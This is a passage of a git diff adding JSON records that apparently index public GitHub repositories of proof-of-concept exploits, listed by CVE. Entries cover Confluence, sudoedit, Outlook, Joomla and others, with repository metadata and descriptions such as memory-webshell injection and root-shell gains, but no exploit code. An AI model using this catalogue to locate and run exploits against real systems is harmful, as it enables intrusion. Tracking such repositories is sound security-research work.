+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72058581?v=4",
+ "html_url": "https:\/\/github.com\/M0untainShley"
+ },
+ "html_url": "https:\/\/github.com\/M0untainShley\/CVE-2023-22527-MEMSHELL",
+ "description": "confluence CVE-2023-22527 漏洞利用工具,支持冰蝎\/哥斯拉内存马注入,支持设置 http 代理",
+ "fork": false,
+ "created_at": "2024-02-26T02:34:44Z",
+ "updated_at": "2024-06-07T14:56:33Z",
+ "pushed_at": "2024-04-24T02:34:16Z",
+ "stargazers_count": 34,
+ "watchers_count": 34,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 34,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 767136230,
+ "name": "cve-2023-22527",
+ "full_name": "vulncheck-oss\/cve-2023-22527",
+ "owner": {
+ "login": "vulncheck-oss",
+ "id": 134310220,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134310220?v=4",
+ "html_url": "https:\/\/github.com\/vulncheck-oss"
+ },
+ "html_url": "https:\/\/github.com\/vulncheck-oss\/cve-2023-22527",
+ "description": "Three go-exploits exploiting CVE-2023-22527 to execute arbitrary code in memory",
+ "fork": false,
+ "created_at": "2024-03-04T19:09:57Z",
+ "updated_at": "2024-03-11T16:13:04Z",
+ "pushed_at": "2024-04-17T13:54:41Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 807402056,
+ "name": "Confluence-RCE",
+ "full_name": "BBD-YZZ\/Confluence-RCE",
+ "owner": {
+ "login": "BBD-YZZ",
+ "id": 132546612,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132546612?v=4",
+ "html_url": "https:\/\/github.com\/BBD-YZZ"
+ },
+ "html_url": "https:\/\/github.com\/BBD-YZZ\/Confluence-RCE",
+ "description": "confluence rce (CVE-2021-26084, CVE-2022-26134, CVE-2023-22527)",
+ "fork": false,
+ "created_at": "2024-05-29T03:20:22Z",
+ "updated_at": "2024-06-17T08:15:03Z",
+ "pushed_at": "2024-05-29T06:14:19Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-2255.json b/2023/CVE-2023-2255.json
new file mode 100644
index 0000000000..8f832ee9fd
--- /dev/null
+++ b/2023/CVE-2023-2255.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 664827690,
+ "name": "CVE-2023-2255",
+ "full_name": "elweth-sec\/CVE-2023-2255",
+ "owner": {
+ "login": "elweth-sec",
+ "id": 39616215,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39616215?v=4",
+ "html_url": "https:\/\/github.com\/elweth-sec"
+ },
+ "html_url": "https:\/\/github.com\/elweth-sec\/CVE-2023-2255",
+ "description": "CVE-2023-2255 Libre Office ",
+ "fork": false,
+ "created_at": "2023-07-10T20:54:56Z",
+ "updated_at": "2024-06-23T01:55:01Z",
+ "pushed_at": "2023-07-10T21:00:09Z",
+ "stargazers_count": 40,
+ "watchers_count": 40,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 40,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 792716677,
+ "name": "CVE-2023-2255",
+ "full_name": "SaintMichae64\/CVE-2023-2255",
+ "owner": {
+ "login": "SaintMichae64",
+ "id": 71401539,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71401539?v=4",
+ "html_url": "https:\/\/github.com\/SaintMichae64"
+ },
+ "html_url": "https:\/\/github.com\/SaintMichae64\/CVE-2023-2255",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-27T11:21:11Z",
+ "updated_at": "2024-05-04T10:24:16Z",
+ "pushed_at": "2024-05-04T10:24:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-22726.json b/2023/CVE-2023-22726.json
new file mode 100644
index 0000000000..e528d2204f
--- /dev/null
+++ b/2023/CVE-2023-22726.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 807560999,
+ "name": "POC-CVE-2023-22726",
+ "full_name": "ProxyPog\/POC-CVE-2023-22726",
+ "owner": {
+ "login": "ProxyPog",
+ "id": 73880723,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73880723?v=4",
+ "html_url": "https:\/\/github.com\/ProxyPog"
+ },
+ "html_url": "https:\/\/github.com\/ProxyPog\/POC-CVE-2023-22726",
+ "description": "CVE-2023-22726",
+ "fork": false,
+ "created_at": "2024-05-29T10:38:30Z",
+ "updated_at": "2024-06-18T15:51:05Z",
+ "pushed_at": "2024-05-29T10:43:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-22809.json b/2023/CVE-2023-22809.json
new file mode 100644
index 0000000000..f6c7e12d73
--- /dev/null
+++ b/2023/CVE-2023-22809.json
@@ -0,0 +1,67 @@
+[
+ {
+ "id": 664513700,
+ "name": "CVE-2023-22809",
+ "full_name": "asepsaepdin\/CVE-2023-22809",
+ "owner": {
+ "login": "asepsaepdin",
+ "id": 122620685,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122620685?v=4",
+ "html_url": "https:\/\/github.com\/asepsaepdin"
+ },
+ "html_url": "https:\/\/github.com\/asepsaepdin\/CVE-2023-22809",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-07-10T06:38:14Z",
+ "updated_at": "2024-06-11T03:20:39Z",
+ "pushed_at": "2023-07-13T06:20:19Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 675212080,
+ "name": "CVE-2023-22809",
+ "full_name": "Toothless5143\/CVE-2023-22809",
+ "owner": {
+ "login": "Toothless5143",
+ "id": 81353028,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81353028?v=4",
+ "html_url": "https:\/\/github.com\/Toothless5143"
+ },
+ "html_url": "https:\/\/github.com\/Toothless5143\/CVE-2023-22809",
+ "description": "Running this exploit on a vulnerable system allows a local attacker to gain a root shell on the machine.",
+ "fork": false,
+ "created_at": "2023-08-06T06:46:40Z",
+ "updated_at": "2024-06-21T00:11:24Z",
+ "pushed_at": "2023-09-03T06:54:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-22809",
+ "exploit",
+ "sudoedit",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-22855.json b/2023/CVE-2023-22855.json
new file mode 100644
index 0000000000..d5713b1a37
--- /dev/null
+++ b/2023/CVE-2023-22855.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 703592151,
+ "name": "CVE-2023-22855",
+ "full_name": "vianic\/CVE-2023-22855",
+ "owner": {
+ "login": "vianic",
+ "id": 61748137,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61748137?v=4",
+ "html_url": "https:\/\/github.com\/vianic"
+ },
+ "html_url": "https:\/\/github.com\/vianic\/CVE-2023-22855",
+ "description": "Security Vulnerability - Kardex Mlog MCC",
+ "fork": false,
+ "created_at": "2023-10-11T14:27:08Z",
+ "updated_at": "2023-10-11T14:27:09Z",
+ "pushed_at": "2023-10-11T14:34:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-22884.json b/2023/CVE-2023-22884.json
new file mode 100644
index 0000000000..351bc587d6
--- /dev/null
+++ b/2023/CVE-2023-22884.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 672206923,
+ "name": "CVE-2023-22884-Airflow-SQLi",
+ "full_name": "jakabakos\/CVE-2023-22884-Airflow-SQLi",
+ "owner": {
+ "login": "jakabakos",
+ "id": 42498816,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4",
+ "html_url": "https:\/\/github.com\/jakabakos"
+ },
+ "html_url": "https:\/\/github.com\/jakabakos\/CVE-2023-22884-Airflow-SQLi",
+ "description": "CVE-2023-22884 PoC",
+ "fork": false,
+ "created_at": "2023-07-29T09:26:36Z",
+ "updated_at": "2024-06-06T11:58:57Z",
+ "pushed_at": "2023-09-07T08:36:47Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-23333.json b/2023/CVE-2023-23333.json
new file mode 100644
index 0000000000..736ea77029
--- /dev/null
+++ b/2023/CVE-2023-23333.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 673443044,
+ "name": "nmap-CVE-2023-23333-exploit",
+ "full_name": "emanueldosreis\/nmap-CVE-2023-23333-exploit",
+ "owner": {
+ "login": "emanueldosreis",
+ "id": 5330737,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5330737?v=4",
+ "html_url": "https:\/\/github.com\/emanueldosreis"
+ },
+ "html_url": "https:\/\/github.com\/emanueldosreis\/nmap-CVE-2023-23333-exploit",
+ "description": "Nmap NSE script to dump \/ test Solarwinds CVE-2023-23333 vulnerability",
+ "fork": false,
+ "created_at": "2023-08-01T16:24:37Z",
+ "updated_at": "2024-06-06T21:51:33Z",
+ "pushed_at": "2023-08-01T16:36:49Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 818735736,
+ "name": "SolarView-Compact-6.00-Command-Injection-Exploit-CVE-2023-23333-",
+ "full_name": "binaryusergearone\/SolarView-Compact-6.00-Command-Injection-Exploit-CVE-2023-23333-",
+ "owner": {
+ "login": "binaryusergearone",
+ "id": 125667320,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125667320?v=4",
+ "html_url": "https:\/\/github.com\/binaryusergearone"
+ },
+ "html_url": "https:\/\/github.com\/binaryusergearone\/SolarView-Compact-6.00-Command-Injection-Exploit-CVE-2023-23333-",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-22T17:54:50Z",
+ "updated_at": "2024-06-22T18:05:03Z",
+ "pushed_at": "2024-06-22T18:04:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-23388.json b/2023/CVE-2023-23388.json
new file mode 100644
index 0000000000..ea977cf706
--- /dev/null
+++ b/2023/CVE-2023-23388.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 819107258,
+ "name": "CVE-2023-23388",
+ "full_name": "ynwarcs\/CVE-2023-23388",
+ "owner": {
+ "login": "ynwarcs",
+ "id": 108408574,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108408574?v=4",
+ "html_url": "https:\/\/github.com\/ynwarcs"
+ },
+ "html_url": "https:\/\/github.com\/ynwarcs\/CVE-2023-23388",
+ "description": "poc for CVE-2023-23388 (LPE in Windows 10\/11 bthserv service)",
+ "fork": false,
+ "created_at": "2024-06-23T19:52:09Z",
+ "updated_at": "2024-06-23T21:22:48Z",
+ "pushed_at": "2024-06-23T20:30:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-23397.json b/2023/CVE-2023-23397.json
new file mode 100644
index 0000000000..79a24105c3
--- /dev/null
+++ b/2023/CVE-2023-23397.json
@@ -0,0 +1,188 @@
+[
+ {
+ "id": 666573953,
+ "name": "OutlookNTLM_CVE-2023-23397",
+ "full_name": "Muhammad-Ali007\/OutlookNTLM_CVE-2023-23397",
+ "owner": {
+ "login": "Muhammad-Ali007",
+ "id": 64638296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64638296?v=4",
+ "html_url": "https:\/\/github.com\/Muhammad-Ali007"
+ },
+ "html_url": "https:\/\/github.com\/Muhammad-Ali007\/OutlookNTLM_CVE-2023-23397",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-07-14T22:02:55Z",
+ "updated_at": "2023-08-06T00:14:02Z",
+ "pushed_at": "2023-07-15T11:21:52Z",
+ "stargazers_count": 20,
+ "watchers_count": 20,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 20,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 710229482,
+ "name": "CVE-2023-23397",
+ "full_name": "Pushkarup\/CVE-2023-23397",
+ "owner": {
+ "login": "Pushkarup",
+ "id": 148672587,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148672587?v=4",
+ "html_url": "https:\/\/github.com\/Pushkarup"
+ },
+ "html_url": "https:\/\/github.com\/Pushkarup\/CVE-2023-23397",
+ "description": "This script exploits CVE-2023-23397, a Zero-Day vulnerability in Microsoft Outlook, allowing the generation of malicious emails for testing and educational purposes.",
+ "fork": false,
+ "created_at": "2023-10-26T09:26:32Z",
+ "updated_at": "2024-02-22T17:54:41Z",
+ "pushed_at": "2023-10-26T10:11:19Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 736472941,
+ "name": "CVE-2023-23397",
+ "full_name": "ducnorth2712\/CVE-2023-23397",
+ "owner": {
+ "login": "ducnorth2712",
+ "id": 112828799,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112828799?v=4",
+ "html_url": "https:\/\/github.com\/ducnorth2712"
+ },
+ "html_url": "https:\/\/github.com\/ducnorth2712\/CVE-2023-23397",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-28T02:20:57Z",
+ "updated_at": "2023-12-28T02:20:58Z",
+ "pushed_at": "2023-12-28T02:20:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 753987117,
+ "name": "CVE-2023-23397-POC",
+ "full_name": "alsaeroth\/CVE-2023-23397-POC",
+ "owner": {
+ "login": "alsaeroth",
+ "id": 159212133,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/159212133?v=4",
+ "html_url": "https:\/\/github.com\/alsaeroth"
+ },
+ "html_url": "https:\/\/github.com\/alsaeroth\/CVE-2023-23397-POC",
+ "description": "C implementation of Outlook 0-click vulnerability",
+ "fork": false,
+ "created_at": "2024-02-07T07:08:55Z",
+ "updated_at": "2024-02-07T07:08:55Z",
+ "pushed_at": "2024-02-07T07:08:55Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 774844975,
+ "name": "CVE-2023-23397-PoW",
+ "full_name": "TheUnknownSoul\/CVE-2023-23397-PoW",
+ "owner": {
+ "login": "TheUnknownSoul",
+ "id": 58050201,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58050201?v=4",
+ "html_url": "https:\/\/github.com\/TheUnknownSoul"
+ },
+ "html_url": "https:\/\/github.com\/TheUnknownSoul\/CVE-2023-23397-PoW",
+ "description": "Proof of Work of CVE-2023-23397 for vulnerable Microsoft Outlook client application.",
+ "fork": false,
+ "created_at": "2024-03-20T09:49:01Z",
+ "updated_at": "2024-03-20T10:39:45Z",
+ "pushed_at": "2024-03-20T10:39:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "exploitation",
+ "hacking",
+ "msoutlook",
+ "netntlm",
+ "smb"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 818675920,
+ "name": "CVE-2023-23397",
+ "full_name": "Symbolexe\/CVE-2023-23397",
+ "owner": {
+ "login": "Symbolexe",
+ "id": 140549630,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140549630?v=4",
+ "html_url": "https:\/\/github.com\/Symbolexe"
+ },
+ "html_url": "https:\/\/github.com\/Symbolexe\/CVE-2023-23397",
+ "description": "CVE-2023-23397: Remote Code Execution Vulnerability in Microsoft Outlook",
+ "fork": false,
+ "created_at": "2024-06-22T14:25:39Z",
+ "updated_at": "2024-06-22T14:27:16Z",
+ "pushed_at": "2024-06-22T14:27:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-23583.json b/2023/CVE-2023-23583.json
new file mode 100644
index 0000000000..4b4f13dfc8
--- /dev/null
+++ b/2023/CVE-2023-23583.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 722159332,
+ "name": "CVE-2023-23583-Reptar-",
+ "full_name": "Mav3r1ck0x1\/CVE-2023-23583-Reptar-",
+ "owner": {
+ "login": "Mav3r1ck0x1",
+ "id": 55414177,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55414177?v=4",
+ "html_url": "https:\/\/github.com\/Mav3r1ck0x1"
+ },
+ "html_url": "https:\/\/github.com\/Mav3r1ck0x1\/CVE-2023-23583-Reptar-",
+ "description": "This script can help determine the CPU ID for the processor of your system, please note that I have not added every CPU ID to this script, edit as needed.",
+ "fork": false,
+ "created_at": "2023-11-22T15:02:49Z",
+ "updated_at": "2023-11-22T15:07:44Z",
+ "pushed_at": "2023-11-24T18:04:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-23607.json b/2023/CVE-2023-23607.json
new file mode 100644
index 0000000000..a486fc5354
--- /dev/null
+++ b/2023/CVE-2023-23607.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 815845980,
+ "name": "CVE-2023-23607",
+ "full_name": "Pylonet\/CVE-2023-23607",
+ "owner": {
+ "login": "Pylonet",
+ "id": 135266995,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/135266995?v=4",
+ "html_url": "https:\/\/github.com\/Pylonet"
+ },
+ "html_url": "https:\/\/github.com\/Pylonet\/CVE-2023-23607",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-16T10:50:32Z",
+ "updated_at": "2024-06-18T15:41:04Z",
+ "pushed_at": "2024-06-18T15:41:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-23752.json b/2023/CVE-2023-23752.json
new file mode 100644
index 0000000000..d696e2db7b
--- /dev/null
+++ b/2023/CVE-2023-23752.json
@@ -0,0 +1,763 @@
+[
+ {
+ "id": 670890725,
+ "name": "CVE-2023-23752",
+ "full_name": "MrP4nda1337\/CVE-2023-23752",
+ "owner": {
+ "login": "MrP4nda1337",
+ "id": 138918718,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/138918718?v=4",
+ "html_url": "https:\/\/github.com\/MrP4nda1337"
+ },
+ "html_url": "https:\/\/github.com\/MrP4nda1337\/CVE-2023-23752",
+ "description": "simple program for joomla scanner CVE-2023-23752 with target list",
+ "fork": false,
+ "created_at": "2023-07-26T04:33:46Z",
+ "updated_at": "2023-07-28T13:48:27Z",
+ "pushed_at": "2023-07-26T18:47:39Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 705283440,
+ "name": "CVE-2023-23752",
+ "full_name": "lainonz\/CVE-2023-23752",
+ "owner": {
+ "login": "lainonz",
+ "id": 73258312,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73258312?v=4",
+ "html_url": "https:\/\/github.com\/lainonz"
+ },
+ "html_url": "https:\/\/github.com\/lainonz\/CVE-2023-23752",
+ "description": "Mass CVE-2023-23752 scanner",
+ "fork": false,
+ "created_at": "2023-10-15T15:30:14Z",
+ "updated_at": "2024-06-02T03:10:30Z",
+ "pushed_at": "2024-06-02T03:10:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 707585637,
+ "name": "CVE-2023-23752",
+ "full_name": "yTxZx\/CVE-2023-23752",
+ "owner": {
+ "login": "yTxZx",
+ "id": 100921463,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100921463?v=4",
+ "html_url": "https:\/\/github.com\/yTxZx"
+ },
+ "html_url": "https:\/\/github.com\/yTxZx\/CVE-2023-23752",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-20T08:17:48Z",
+ "updated_at": "2023-10-20T08:19:57Z",
+ "pushed_at": "2023-10-20T08:35:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 707706726,
+ "name": "CVE-2023-23752",
+ "full_name": "AlissonFaoli\/CVE-2023-23752",
+ "owner": {
+ "login": "AlissonFaoli",
+ "id": 129133392,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129133392?v=4",
+ "html_url": "https:\/\/github.com\/AlissonFaoli"
+ },
+ "html_url": "https:\/\/github.com\/AlissonFaoli\/CVE-2023-23752",
+ "description": "Joomla Unauthenticated Information Disclosure (CVE-2023-23752) exploit",
+ "fork": false,
+ "created_at": "2023-10-20T13:32:28Z",
+ "updated_at": "2024-04-25T19:49:11Z",
+ "pushed_at": "2024-04-25T19:49:08Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 709715554,
+ "name": "CVE-2023-23752",
+ "full_name": "Pushkarup\/CVE-2023-23752",
+ "owner": {
+ "login": "Pushkarup",
+ "id": 148672587,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148672587?v=4",
+ "html_url": "https:\/\/github.com\/Pushkarup"
+ },
+ "html_url": "https:\/\/github.com\/Pushkarup\/CVE-2023-23752",
+ "description": "Exploit for CVE-2023-23752 (4.0.0 <= Joomla <= 4.2.7).",
+ "fork": false,
+ "created_at": "2023-10-25T08:53:12Z",
+ "updated_at": "2024-03-26T00:00:16Z",
+ "pushed_at": "2023-10-25T09:39:10Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 711978619,
+ "name": "CVE-2023-23752",
+ "full_name": "blacks1ph0n\/CVE-2023-23752",
+ "owner": {
+ "login": "blacks1ph0n",
+ "id": 139291686,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/139291686?v=4",
+ "html_url": "https:\/\/github.com\/blacks1ph0n"
+ },
+ "html_url": "https:\/\/github.com\/blacks1ph0n\/CVE-2023-23752",
+ "description": "Joomla Unauthorized Access Vulnerability",
+ "fork": false,
+ "created_at": "2023-10-30T14:54:56Z",
+ "updated_at": "2023-10-30T14:54:57Z",
+ "pushed_at": "2023-11-03T19:14:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 724701583,
+ "name": "Joomla-v4.2.8---CVE-2023-23752",
+ "full_name": "Youns92\/Joomla-v4.2.8---CVE-2023-23752",
+ "owner": {
+ "login": "Youns92",
+ "id": 56968891,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56968891?v=4",
+ "html_url": "https:\/\/github.com\/Youns92"
+ },
+ "html_url": "https:\/\/github.com\/Youns92\/Joomla-v4.2.8---CVE-2023-23752",
+ "description": "CVE-2023-23752 ",
+ "fork": false,
+ "created_at": "2023-11-28T16:08:16Z",
+ "updated_at": "2023-12-03T11:50:57Z",
+ "pushed_at": "2023-11-28T16:27:37Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 725209716,
+ "name": "Joomla-CVE-2023-23752-Exploit-Script",
+ "full_name": "Ly0kha\/Joomla-CVE-2023-23752-Exploit-Script",
+ "owner": {
